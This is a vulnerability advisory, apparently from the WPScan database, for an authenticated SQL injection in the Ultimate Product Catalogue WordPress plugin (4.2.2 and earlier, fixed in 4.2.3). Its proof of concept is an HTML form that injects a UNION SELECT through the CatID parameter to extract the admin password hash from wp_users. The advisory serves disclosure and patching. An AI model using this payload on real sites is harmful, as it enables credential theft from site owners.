Ultimate Product Catalogue <= 4.2.2 - Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Type user access: subscriber upwards.

$_POST[‘CatID’] is not escaped.

File / Code:

Path: /wp-content/plugins/ultimate-product-catalogue/Functions/Process_Ajax.php

Proof of Concept
<form method="post" action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories">
<input type="text" name="CatID" value="0 UNION SELECT user_login,user_pass FROM wp_users WHERE ID=1">
<input type="submit">

Affects Plugin

fixed in version 4.2.3

References

URL http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite / Log.pt
Submitter Website http://lenonleite.com.br/
Submitter Twitter log_oscon
Views 163
Verified Yes
WPVDB ID 8853

Timeline

Publicly Published 2017-06-27 (5 months ago)
Added 2017-06-28 (5 months ago)
Last Updated 2017-06-28 (5 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.